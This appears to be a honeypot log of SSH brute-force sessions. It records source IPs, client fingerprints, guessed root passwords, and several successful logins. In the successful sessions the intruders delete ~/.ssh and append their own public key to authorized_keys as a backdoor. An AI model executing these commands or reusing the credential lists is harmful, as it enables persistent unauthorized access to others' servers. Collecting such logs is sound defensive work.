Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "7aa33365abeb",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:18:13.714449Z",
"end_time": "2026-05-15T12:18:15.779769Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Abcd123@
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "fa50072c7878",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:18:11.487823Z",
"end_time": "2026-05-15T12:18:17.015483Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Abcd123@"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: saas
{
"id": "2be01430718f",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:17:45.047719Z",
"end_time": "2026-05-15T12:17:46.356437Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "saas",
"pass": "saas"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "1aff66cd7d88",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:17:05.038811Z",
"end_time": "2026-05-15T12:17:05.352555Z",
"duration": "0.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "822fc09e9867",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:17:03.689258Z",
"end_time": "2026-05-15T12:17:04.997259Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Sugipula123$
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "213647806996",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:17:02.984689Z",
"end_time": "2026-05-15T12:17:05.349609Z",
"duration": "2.4",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Sugipula123$"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "0d0d460303ed",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:16:49.351750Z",
"end_time": "2026-05-15T12:16:50.427022Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "1b62fe6d4ac8",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:16:47.112730Z",
"end_time": "2026-05-15T12:16:49.183667Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / server@2026
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "68ecb442bcce",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:16:44.921621Z",
"end_time": "2026-05-15T12:16:50.424100Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "server@2026"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "7114c713257b",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:16:23.478106Z",
"end_time": "2026-05-15T12:16:23.790770Z",
"duration": "0.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "2dbd0912c4b8",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:16:22.129351Z",
"end_time": "2026-05-15T12:16:23.436355Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Qwer@12345
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "230a68a658a7",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:16:21.425767Z",
"end_time": "2026-05-15T12:16:23.787854Z",
"duration": "2.4",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Qwer@12345"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: yusuf
{
"id": "040d6d3f42a8",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:15:38.434279Z",
"end_time": "2026-05-15T12:15:39.747484Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "yusuf",
"pass": "yusuf"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: g9q7jreo
{
"id": "cd11187c2035",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:15:20.136041Z",
"end_time": "2026-05-15T12:15:22.205051Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "g9q7jreo",
"pass": ".GxRJez2m1MHgY2j4lgG"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: forward
{
"id": "394c71922d2d",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:14:57.403008Z",
"end_time": "2026-05-15T12:14:58.711382Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "forward",
"pass": "forward"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: g9q7jreo
{
"id": "934791e8d39f",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:14:15.901282Z",
"end_time": "2026-05-15T12:14:17.210943Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "g9q7jreo",
"pass": ".GxRJez2m1MHgY2j4lgG"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: linux
{
"id": "2d032d7ca283",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:13:56.228237Z",
"end_time": "2026-05-15T12:13:58.298470Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "linux",
"pass": "linux123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: webadmin
{
"id": "6be48d145cdf",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:13:36.026064Z",
"end_time": "2026-05-15T12:13:37.333454Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "webadmin",
"pass": "12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: clara
{
"id": "b614593deaea",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:12:53.352150Z",
"end_time": "2026-05-15T12:12:54.661164Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "clara",
"pass": "clara"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: demo
{
"id": "03d6b5f37f2c",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:12:30.934600Z",
"end_time": "2026-05-15T12:12:33.003627Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "demo",
"pass": "demo@123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: rootadmin
{
"id": "57bc284092ce",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:12:10.374851Z",
"end_time": "2026-05-15T12:12:11.686276Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "rootadmin",
"pass": "rootadmin@123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: hasan
{
"id": "8c4a235ae620",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:11:28.419161Z",
"end_time": "2026-05-15T12:11:29.729751Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "hasan",
"pass": "hasan"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: fecjl1yg
{
"id": "b5e05d78c61a",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:11:04.694515Z",
"end_time": "2026-05-15T12:11:06.767304Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "fecjl1yg",
"pass": "3sScGbQLYlTZvYdQqsZA"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: ftp
{
"id": "82b78f5e86a7",
"src_ip": "193.46.255.86",
"start_time": "2026-05-15T12:10:51.766637Z",
"end_time": "2026-05-15T12:10:58.806911Z",
"duration": "7.0",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "ftp",
"pass": "ftp"
},
{
"user": "ftp",
"pass": "123456"
},
{
"user": "ftp",
"pass": "12345"
},
{
"user": "ftp",
"pass": "ftp123"
},
{
"user": "ftp",
"pass": "abc123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: testuser
{
"id": "d2e360b4f764",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:10:46.634332Z",
"end_time": "2026-05-15T12:10:47.945622Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "testuser",
"pass": "12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "f2d9e299630c",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:10:05.946315Z",
"end_time": "2026-05-15T12:10:06.261444Z",
"duration": "0.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "fa6cc29b5672",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:10:04.592509Z",
"end_time": "2026-05-15T12:10:05.903673Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / abcd1234.
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "a25ac5d035d6",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:10:03.892285Z",
"end_time": "2026-05-15T12:10:06.257638Z",
"duration": "2.4",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "abcd1234."
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pakchoi
{
"id": "1390f5b7a821",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:09:36.453242Z",
"end_time": "2026-05-15T12:09:38.521914Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "pakchoi",
"pass": "Kermit123@"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: bvpn
{
"id": "24b91f9441e1",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:09:21.482805Z",
"end_time": "2026-05-15T12:09:22.794238Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "bvpn",
"pass": "bvpn"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: mysql
{
"id": "efbe1086dc98",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:08:40.910385Z",
"end_time": "2026-05-15T12:08:42.226242Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "mysql",
"pass": "M3gaP33!"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "235527ceccc0",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:08:15.111009Z",
"end_time": "2026-05-15T12:08:16.179313Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "8d9d6edcefe9",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:08:12.882356Z",
"end_time": "2026-05-15T12:08:14.942969Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
